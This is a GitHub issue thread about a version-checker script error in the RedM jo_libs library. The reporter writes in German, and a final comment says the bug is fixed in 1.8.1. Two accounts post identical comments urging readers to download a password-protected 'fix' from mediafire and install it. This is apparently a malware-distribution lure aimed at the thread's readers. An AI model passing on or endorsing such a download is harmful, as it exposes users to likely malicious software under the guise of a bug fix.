### ISSUE TITLE
version-checker

### ISSUE THREAD

**Issue by lutzip0** [Jump-On-Studios/RedM-jo_libs#22]
[      script:jo_libs] jo_libs: VORP detected
[      script:jo_libs] SCRIPT ERROR: @jo_libs/modules/version-checker/server.lua:74: attempt to index a function value (field 'framework')
[      script:jo_libs] > fn (@jo_libs/modules/version-checker/server.lua:74)

gerade die Version 1.8.0 installiert und da kommt diese Meldung.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KadDarem** [comment]
Fixed in the 1.8.1
